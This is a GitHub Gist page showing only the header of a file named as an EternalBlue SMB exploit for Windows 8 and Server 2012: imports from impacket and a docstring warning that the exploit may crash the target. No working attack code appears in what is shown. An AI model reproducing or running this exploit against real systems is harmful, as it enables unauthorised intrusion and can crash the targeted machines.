Skip to content

Instantly share code, notes, and snippets.

View SergANT85's full-sized avatar

Sergey Bobkov SergANT85

View GitHub Profile
@SergANT85
SergANT85 / eternalblue8_exploit.py
Created May 27, 2017 11:48 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)